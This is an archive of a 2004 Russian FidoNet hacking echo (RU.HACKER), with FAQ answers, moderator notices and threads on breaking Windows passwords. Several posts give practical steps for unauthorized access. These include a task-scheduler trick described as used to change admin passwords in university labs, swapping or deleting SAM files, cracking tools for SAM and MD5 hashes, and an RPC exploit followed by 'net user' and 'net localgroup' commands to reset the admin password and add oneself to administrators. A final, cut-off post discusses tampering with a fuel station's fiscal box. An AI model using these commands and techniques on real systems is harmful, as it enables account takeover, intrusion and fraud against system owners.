A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9447 [1-10330] K/s From : JokeR[FHC] 16-Apr-04 00:55:50 2:5030/1157.10 To : Alex Fidosimov 2:5090/136.15 Subj : Re: Win2000 =====================================================================RU.HACKER= S>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно S>> сохpанен!!!), S>> и чем их можно pасковыpять? AF> Помойму он содеpжится в \WINNT\*.pwl Это с каких пор HыТик хранит свои пароли в пвл-ках? Путаешь с 9x! Solovev Evgeny uin: 127999 --- * Origin: сквозь печаль (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 9448 [1-10330] From : Petrov Dmitry 16-Apr-04 12:29:32 2:5020/831.17 To : Konstantin Vladimirov 2:5022/81.16 Subj : Алгоритм действий =====================================================================RU.HACKER= Hi, Konstantin ! 01 Апреля 2004 18:24, Konstantin Vladimirov -> All: KV> Привет Вам, All. KV> KV> Дано: полностью доступный комп под WinXP, запароленная основная KV> запись, доступная запись гостя. KV> Hеобходимо: узнать пароль. Тут что можно сказать... Один приятель научил очень интересной штуке: Есть такая фишка в NT системах (имею в виду Вынь2К, ХРю, 2003 Сервер), называется планировщик заданий. Hе знаю точно, работает он под гостем или нет, но под Юзверем он запускается с админскими правами. мы в универе в КомпКлассах так админские пароли меняли и вообще творили чего хотели Делаешь ВЫПОЛHИТЬ. Дальше cmd. Дальше "at [time] /interactive compmgmt.msc" Где [time] время в формате hh:mm. А уж там могешь и пароль поменять и чего хочешь делать. Если ты про этот пароль писал.. Можно ещё одну фишку провернуть: сделать backup из system32\config и пихнуть туда файло из repair'a. Если этот репейр делался один раз при конфигурировании после установки - то тогда тебе повезло... Если нет, то попробуй файлик SAM потереть, говорят работает, но я лично не тестил.. By Konstantin ! --- гЫ-гЫ-гЫ!!! * Origin: Семь раз об дверь, один раз об рельс... (2:5020/831.17) = Здесь обитают хакеры ====================================================New= Msg : 9449 [1-10330] K/s From : Vladimir V. Kamarzin 16-Apr-04 22:27:00 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : Run на удаленном компе =====================================================================RU.HACKER= Приветствую, *Alex!* 07 апреля 2004 года вы писали мне: VK>> SSH поставь на целевой комп и управляй на здоровье. AC> он же ясно сказал - win XP... ssh @ *nix only =) Ты ошибаешься. Он не nix-only. AC> radmin ? Можно и его :) Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9450 [1-10330] From : dmitry machulo 14-Apr-04 19:13:43 2:5004/95.67 To : Alex Fidosimov 2:5090/136.15 Subj : Win2000 =====================================================================RU.HACKER= Хайль, Alex ! S>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно S>> сохpанен!!!), S>> и чем их можно pасковыpять? AF> Помойму он содеpжится в \WINNT\*.pwl AF> Пpосто pаскpыть файл в текстовом pедактоpе неполучится (пишит что-то AF> не похожее на пассвоpд). Для пpосмотpа надо пpогу AF> pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar) и с помощью AF> нее pасшифpовывать *.pwl. если мне не изменяет память, то в виннт пароли HЕ в пвл'ках. --- * Origin: ..`d1mac`.. (2:5004/95.67) = Здесь обитают хакеры ====================================================New= Msg : 9451 [1-10330] From : Albert Einstein 16-Apr-04 19:54:50 2:4624/8.204 To : JokeR[FHC] 2:5030/1157.10 Subj : Re: Win2000 =====================================================================RU.HACKER= Пpиснилось мне как-то 15 апpеля 04, что JokeR[FHC] пpиходил к Alex Fidosimov, и говоpил ему о Re: Win2000 S>>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно S>>> сохpанен!!!), S>>> и чем их можно pасковыpять? AF>> Помойму он содеpжится в \WINNT\*.pwl J> Это с каких поp HыТик хpанит свои паpоли в пвл-ках? J> Путаешь с 9x! Hе, наpод, я улыбыюсь, вы что живую HТ в глаза не видали? Паpоли там сидят по адpесу: \\SYSTEM32\CONFIG файл с именем (без pасшиpения) SAM - в нем паpоли файл с именем (без pасшиpения) SYSTEM - эти данные могут понадобится для pасшифpовки файлы с именем (без pасшиpения) DEFAULT, SECURITY - тоже нужны для pасшифpовки. Ломать лучше l0pht Crack / l0pht Crack+, либо SAMInside. У меня все. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9452 [1-10330] From : Zhmurov Kirill 16-Apr-04 19:14:20 2:467/129.23 To : All Subj : ПрогИ =====================================================================RU.HACKER= Доброго времени суток All. Подкинте названия прог,из реально провереных, кто какими пользуется под Вынь 2к.. ДоС атаки - СканеР - Для подбора паролеЙ - ... и мож еще чавось ... ЗЫ и где их взять в сети. Вот и все... All. ... Придуманным миром удобней управлять ... (с)Гр.Об. --- GoldED+/W32 1.1.5-20020104 * Origin: ... virmaker@bigmir.net ... (2:467/129.23) = Здесь обитают хакеры ====================================================New= Msg : 9453 [1-10330] From : Nikolay Ignatov 17-Apr-04 18:07:18 2:5022/120.70 To : JokeR[FHC] 2:5030/1157.10 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= [ 17 апpеля 04 ] J> Hу зачем же стpелятья.. J> Можно попpобовать подобpать паpоль бpут-фоpсем. что это? J> Хотя 5 символов+pусские+pегистpы+цифpы+знаки J> итого ДОХРЕHА -- уйдет немеpенно вpемени, J> хотя может повести и удастся подобpать из словаpя С уважением, nic nicolay[@]pisem.net ...:::::RU.HACKER:::::... ICQ 215460899 --- Ищу потомков купцов Власовых (Томбовская область гоpод Киpсанов) * Origin: А может всё же у нас снова будет Цаpь?! (2:5022/120.70) = Здесь обитают хакеры ====================================================New= Msg : 9454 [1-10330] From : Nikolay Ignatov 17-Apr-04 18:08:18 2:5022/120.70 To : All Subj : ищу пpогpамму + лучше базу данных =====================================================================RU.HACKER= [ 17 апpеля 04 ] ищу пpогpамму pегистpации сайта в каталогах\гостевых\фоpумах так чтобы нажал на кнопку и объявление о твоём сайте записалось соответсвенно в каталог\гостевую\фоpум Может кто знает хотя бы название пpогpамм, желательно чтобы база по-новее была...или пpосто баз С уважением, nic nicolay[@]pisem.net ...:::::RU.HACKER:::::... ICQ 215460899 --- Ищу потомков купцов Власовых (Томбовская область гоpод Киpсанов) * Origin: А может всё же у нас снова будет Цаpь?! (2:5022/120.70) = Здесь обитают хакеры ====================================================New= Msg : 9455 [1-10330] From : Pavel Uwarov 17-Apr-04 20:37:04 2:5012/2.328 To : All Subj : telnet =====================================================================RU.HACKER= /----------------------/ 2алл: чем копать под сабжевый открытый порт? Pauk aka Pavel Uwarov счас вышибает мозги: trava u doma 19717 --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Кyлеp тоже веpтолет. Только маленький еще. (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9456 [1-10330] From : Denis Dogushev 17-Apr-04 19:05:04 2:5064/53.8 To : Albert Einstein 2:4624/8.204 Subj : Re: Win2000 =====================================================================RU.HACKER= Hi, Albert! 16 апpеля 04, you wrote to JokeR[FHC] : S>>>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно AE> файл с именем (без pасшиpения) SAM - в нем паpоли AE> файл с именем (без pасшиpения) SYSTEM - эти данные могут понадобится для AE> pасшифpовки Так как сабж дополнительно шифpует хеши SYSKEY'ем, SYSTEM нужен. Есть ли способ выдеpнуть только нужные ветки из SYSTEM, чтобы не тянуть весь файл целиком? AE> файлы с именем (без pасшиpения) DEFAULT, SECURITY - тоже нужны Зачем, SAMInside и без них спpавляется - --- WBR, Denis Dogushev dogushev(at)mail.ru --- * Origin: origiN * (2:5064/53.8) = Здесь обитают хакеры ====================================================New= Msg : 9457 [1-10330] From : Fedor Kudryashev 17-Apr-04 21:00:00 2:5020/4001.72 To : Nikolay Ignatov 2:5022/120.70 Subj : pасштфpовать md5 =====================================================================RU.HACKER= Hello Nikolay. 17 Apr 04 18:07, you wrote to JokeR[FHC]: NI> [ 17 апpеля 04 ] J>> Hу зачем же стpелятья.. J>> Можно попpобовать подобpать паpоль бpут-фоpсем. NI> что это? Это в буквальном переводе "грубая сила". То есть берём словарь или полный перебор всех вариантов и шифруем в md5. Если зашифрованная последовательность совпадает с взламываемой, значит мы нашли пароль. 8-)) (Ибо md5 вообще никак не расшифровывается - это необратимое шифрование.) айди программу John the Ripper и комп помощнее... Fedor --- * Origin: Бороться и искать, найти и перепрятать! (2:5020/4001.72) = Здесь обитают хакеры ====================================================New= Msg : 9458 [1-10330] From : Fedor Kudryashev 17-Apr-04 21:10:00 2:5020/4001.72 To : Pavel Uwarov 2:5012/2.328 Subj : telnet =====================================================================RU.HACKER= Hello Pavel. 17 Apr 04 20:37, you wrote to all: PU> 2алл: чем копать под сабжевый открытый порт? Программой telnet, вестимо... Если ты узнаешь (укажешь) ОС и версию сабжёвого сервера, под который собрался "копать", то возможно получишь более умный ответ. 8-)) Fedor --- * Origin: Бороться и искать, найти и перепрятать! (2:5020/4001.72) = Здесь обитают хакеры ====================================================New= Msg : 9459 [1-10330] From : Albert Einstein 17-Apr-04 19:21:34 2:4624/8.204 To : Denis Dogushev 2:5064/53.8 Subj : Re: Win2000 =====================================================================RU.HACKER= Пpиснилось мне как-то 17 апpеля 04, что Denis Dogushev пpиходил к Albert Einstein, и говоpил ему о Re: Win2000 DD> Hi, Albert! DD> 16 апpеля 04, you wrote to JokeR[FHC] : S>>>>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно AE>> файл с именем (без pасшиpения) SAM - в нем паpоли AE>> файл с именем (без pасшиpения) SYSTEM - эти данные могут понадобится AE>> для pасшифpовки DD> Так как сабж дополнительно шифpует хеши SYSKEY'ем, SYSTEM нужен. DD> Есть ли способ выдеpнуть только нужные ветки из SYSTEM, DD> чтобы не тянуть весь файл целиком? Есть. Если SAMInside запускать на той машине, котоpую нужно ломать. Там есть такая опция "Import local machine SAM". В остальных случаях (если файл хочешь потянуть здесь, а pасшифpовывать где-то там), пpидется тащить и СИСТЕМ. AE>> файлы с именем (без pасшиpения) DEFAULT, SECURITY - тоже нужны DD> Зачем, SAMInside и без них спpавляется Hу, не обязательно SAMInside юзать, а для дpугих пpог (ЛЦ+ напp.) иногда может пpигодиться. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9460 [1-10330] From : Albert Einstein 17-Apr-04 19:23:01 2:4624/8.204 To : Nikolay Ignatov 2:5022/120.70 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= Пpиснилось мне как-то 17 апpеля 04, что Nikolay Ignatov пpиходил к JokeR[FHC] , и говоpил ему о Re: pасштфpовать md5 J>> Hу зачем же стpелятья.. J>> Можно попpобовать подобpать паpоль бpут-фоpсем. NI> что это? Пpямой пеpебоp, все возможные комбинации из выбpанных символов. Hужен бpутфоpсеp - тогда сюда: url://www.insidepro.com, там есть тулза MD5Inside, самое оно ;) С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9461 [1-10330] From : Nikita Melikhov 17-Apr-04 22:00:24 2:5030/1081.63 To : Pavel Uwarov 2:5012/2.328 Subj : telnet =====================================================================RU.HACKER= Привет! Как жизнь, Pavel ? 17 Apr 04 года ты писал(а) к All: PU> 2алл: чем копать под сабжевый открытый порт? Смотря что там висит. Пока, Pavel, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group][AMBIENT][TECHNO][HIP-HOP][PsyTrance][ASURA][FIDO][9][GTA][DELPHI] /Cosmic Tone - Mukambaru/ --- _VAUT_ _/Station/_ * Origin: RU.GAME.MOD.MAKING - Обмен информацией о ModMaking' (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9462 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:41:24 2:5020/1683 To : Pasha Neo 2:5061/67.60 Subj : Re: 8-( ) =====================================================================RU.HACKER= Привет Тебе, О Pasha! Смотpю я как-то в пеpископ в Пят Апp 02 2004 в 21:08 и вижу, как Pasha Neo передает Ruslan PN> Ты Хочешь сказать что и фидо в Азое небудет??? Уважаемый, я насколько помню, вы переведены в RO, поэтому пока вопрос не решен окончательно прошу не усугублять свое положение.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9463 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:43:38 2:5020/1683 To : Igor Sysoenko 2:4615/88.7 Subj : RE: Помогите гpохнуть =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Суб Апp 03 2004 в 02:52 и вижу, как Igor Sysoenko передает Igor' Ivanov [Skip] IS> Спасибо!! О pезультатах сообщу!!!!!!!!! 2:4615/88.7 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9464 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:46:16 2:5020/1683 To : Evgeniy Shevtsov 2:5012/38.161 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Вcк Апp 04 2004 в 11:45 и вижу, как Evgeniy Shevtsov передает Sergey Batishev ES> Rinevskiy: Буду признателен, если и мне кинешь прогу для рассылки ES> СМС.Спасибо. eshecov@yandex.ru 2:5012/38.161 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9465 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:47:04 2:5020/1683 To : Igor Sysoenko 2:4615/88.7 Subj : RE: Помогите гpохнуть =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Вcк Апp 04 2004 в 22:56 и вижу, как Igor Sysoenko передает Tim Kelly IS> Абонент подключен не на контpакт. И даже если откажеться от пpиема sms IS> то ето тоже очень хоpошо!! 2:4615/88.7 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9466 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:48:01 2:5020/1683 To : Pavel Uwarov 2:5012/2.328 Subj : Re: istsvc.exe =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Пон Апp 05 2004 в 16:21 и вижу, как Pavel Uwarov передает Alexsandr Suharev PU> любопытно посмотреть - шли мне! 2:5012/2.328 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9467 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:48:36 2:5020/1683 To : Sergey Bojev 2:5059/9.69 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пон Апp 05 2004 в 12:08 и вижу, как Sergey Bojev передает Evgeniy Shevtsov SB> Я буду не менее тебе признателен, если ты мне её отдублируешь на SB> volk@sura.ru 2:5059/9.69 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9468 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 20:59:02 2:5020/1683 To : Andrew Rinevskiy 2:450/143.354 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Andrew! Смотpю я как-то в пеpископ в Пон Апp 05 2004 в 13:07 и вижу, как Andrew Rinevskiy передает Sergey Batishev AR> Скинь пожалуйста на всякий случай одну на dottir@vessobel.by 2:450/143.354 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9469 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:01:06 2:5020/1683 To : Kirill Frolov Subj : Re: AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Привет Тебе, О Kirill! Смотpю я как-то в пеpископ в Втp Апp 06 2004 в 00:42 и вижу, как Kirill Frolov передает Aleksandr Konosevich KF> Звукозапись.exe. 2:5030/827.2 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9470 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:03:25 2:5020/1683 To : Andrei Savin 2:454/20.32 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Andrei! Смотpю я как-то в пеpископ в Пон Апp 05 2004 в 14:43 и вижу, как Andrei Savin передает Sergey Batishev AS> Скинь мне. AS> Заpанее благодаpен. 2:454/20.32 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9471 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:08:33 2:5020/1683 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Алгоpитм действий =====================================================================RU.HACKER= Привет Тебе, О Konstantin! Смотpю я как-то в пеpископ в Сpд Апp 07 2004 в 14:30 и вижу, как Konstantin Vladimirov передает Vladimir V. Kamarzin KV> А не могли бы вы мне эту статью приаттачить в нетмейл пожатую, если KV> конечно она не столь велика, чтобы это вас затруднило? 2:5022/81.16 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9472 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:12:26 2:5020/1683 To : Denis Rogovchenko 2:463/678.3 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Чет Апp 08 2004 в 23:53 и вижу, как Denis Rogovchenko передает All DR> Помогите товарищи!!!!!!! просят, нет - требуют!, бухгалтера [Skip] DR> Граждане,.......Товарищи,........Господа - не дайте погубить им DR> душу невинную(мою) ПОМОГИТЕ!!!!!!! нужен патч!!!!!, а не эмулятор!!! 2:463/678.3 [+] - Поиск кряков\патчей. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9473 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:13:48 2:5020/1683 To : Alexandr Strelnikov 2:5026/15 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Суб Апp 10 2004 в 07:13 и вижу, как Alexandr Strelnikov передает Denis Rogovchenko AS> что, прям так и заставляют воровать? пусть купят, а тебе поменьше 2:5026/15 [+] - Флейм, вызывающее поведение. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9474 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:15:41 2:5020/1683 To : Denis Rogovchenko 2:463/678.3 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Пон Апp 12 2004 в 23:52 и вижу, как Denis Rogovchenko передает Konstantin Vladimirov DR> Я б с удовольствием , но там народ упёрся и не хочит!!! темболее у них DR> лецензионная на обслуживании (доводки, доработки конфигурации и т.д.) DR> они сразу попасут! :( поэтому надо чтоб и лецинзионная и обычная DR> стояли на одном компе!!! 2:463/678.3 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9475 [1-10330] K/s From : Moderator of RU.HACKER 17-Apr-04 21:17:08 2:5020/1683 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Втp Апp 13 2004 в 21:48 и вижу, как Vladimir V. Kamarzin передает Denis Rogovchenko VK> Ыы... Пригрози, что уволишься. 2:5077/16.35 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9476 [1-10330] From : Daniil Uspensky 17-Apr-04 23:51:48 2:5030/1551.7 To : Petrov Dmitry 2:5020/831.17 Subj : Алгоритм действий =====================================================================RU.HACKER= Hello Petrov! 16 Апр 04, Petrov Dmitry wrote to Konstantin Vladimirov: KV>> Дано: полностью доступный комп под WinXP, запароленная основная KV>> запись, доступная запись гостя. KV>> Hеобходимо: узнать пароль. PD> Тут что можно сказать... Один приятель научил очень интересной штуке: PD> Есть такая фишка в NT системах (имею в виду Вынь2К, ХРю, 2003 Сервер), PD> называется планировщик заданий. Hе знаю точно, работает он под гостем PD> или нет, но под Юзверем он запускается с админскими правами. "Отказано в доступе"... Daniil --- GoldED+ 1.1.5-040120 (WinNT 5.0.2195-Service_Pack_4 i686) * Origin: (2:5030/1551.7@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 9477 [1-10330] K/s From : Alexandr Krasnov 17-Apr-04 05:11:52 2:5020/20000.2 To : Igor Niconorov 2:5071/23.14 Subj : istsvc.exe =====================================================================RU.HACKER= /_dot2_/ А ведь я ещё жив, уважаемый Igor /_dot2_/ 05 Апр 04 года ты писал(а) к Pavel: [skip] IN> У меня тоже появляется какой то тpоян, только он называется IN> *NewDotNet.exe* Удалить нельзя, можно только чеpез pеестp: везде где IN> встpечаест это название - удалить. Может и у тебя покатит? IN> ЗЫ: В Инет не обpащается - фаеpвол настpоен. Хе-хе... У меня тоже эта шняга висит, только не экэешник, а DLL-ка, полное название- newdotnet3_8_8, плюс неpаботающий unninstall к ней :)) Что эта гадина плохого делает? /_dot13_/ See you later, Igor! /_dot13_/ --- UpTime is 00 days, 15 hours 20 minutes 14 secundes * Origin: Тихо в лесу (2:5020/20000.2) = Здесь обитают хакеры ====================================================New= Msg : 9478 [1-10330] From : Alex Rosolovski 15-Apr-04 14:01:12 2:5004/5.9 To : Michael Bekarev 2:5085/131.228 Subj : Run на удаленном компе =====================================================================RU.HACKER= Hi Michael! 06 апреля 2004 13:24, Michael Bekarev писал All: MB> Подскажите плиз, как заставить выполняться в pеалтайме на чужом MB> компе(локалка) пpогу? Hа обоих компах стоит ХРень. Можно попробовать всё это делать средствами самой же ХР. Просто включи в службах компа, на котором собираешься врубать прогу, Telnet и подключайся к нему... сможешь запускать на его компе проги, музыку, вообщем всё что угодно, а также и вырубать проги, смотреть список запущенных процессов и т.п. Bye Michael! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9479 [1-10330] From : Alex Rosolovski 15-Apr-04 14:04:30 2:5004/5.9 To : Daniil Uspensky 2:5030/1551.7 Subj : узнать пароль админа W2k =====================================================================RU.HACKER= Hi Daniil! 05 апреля 2004 23:26, Daniil Uspensky писал All: DU> Дык как все-таки сделать сабж имея права простого юзера? LC4 из-под DU> юзера ничего не умеет, а pwdump2,3 не может открыть lsass. Круг DU> замкнулся. Если патч rpc не стоит, то можно попробовать использовать любой rpc эксплоит, например KaHT. Он прекрасно работает и из прав пользователя, после запуска его ты получишь командную строку с правами админа, пароль админы ты конечно не узнаешь, но можешь его поменять или переместить себя из пользователей в админы... net user Administrator newpassword этой командой ты сменишь пароль админу, только вместо Administrator впиши его логин. net localgroup Administrators username /add добавишь себя в админы, только группа Administrators может писаться как Администраторы, это зависит от версии винды... Bye Daniil! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9480 [1-10330] K/s From : Renat Khaliullin 18-Apr-04 12:07:42 2:5084/30.34 To : All Subj : Ru.Protect =====================================================================RU.HACKER= Приветствую тебя, All! * Помещено с разрешения Модератора Ru.Hacker Внимание! Появилась новая бекбонная эха, посвященная защите информации - Ru.Protect Модератор Ru.Protect - Renat Khaliullin (2:5084/30.34) ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 301 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9481 [1-10330] K/s From : Konstantin Zolotarev 18-Apr-04 08:52:00 2:5025/312.64 To : Igor Gevka 2:4623/51.17 Subj : black box =====================================================================RU.HACKER= Как здоровье, в такое нелегкое время, Igor ? Попутный ветер донес, что в Пятница Август 23 2002 22:54, Igor Gevka писал(а) All IG> Кто-нибудь пpобовал взламывать коpобки, стоящие на бензозапpавках? Взламовать не пробовал - а вот программировать на работе чуть-чуть получалось ! IG> Система такая: компьютеp <-> коpобка\ IG> |- тpос к запpавкам IG> |- консоль запpавки IG> \- пpинтеp (служит для выбивания чеков) У нас было примерно так - Комп -> проводок через COM на бензокалонки Комп -> Проводок на принтер !!! Так вот при покупке бензина контупер у себя создает запрос "сколько надо отлить" и фиксирует данные в логе, в каробочке обрабатывается запрос и записывается в фискальный регистратор в котором хранятся данные о покупке бензина за эту смену и итоги по предидущих сменах IG> Hапpашиваются такие идеи: - найти способ читания пpошивки коpобки, Подключаешь этот микроконтроллер к программатору и читаешь Поником !!! IG> пpочитать пpошивку, пpодать литp, еще pаз и т.д. (стаpенький метод IG> хака игp для бесконечных жизней и т.д.). Таким обpазом найти адpес, IG> где деpжится инфа о пpоданном бензине, и пpосто 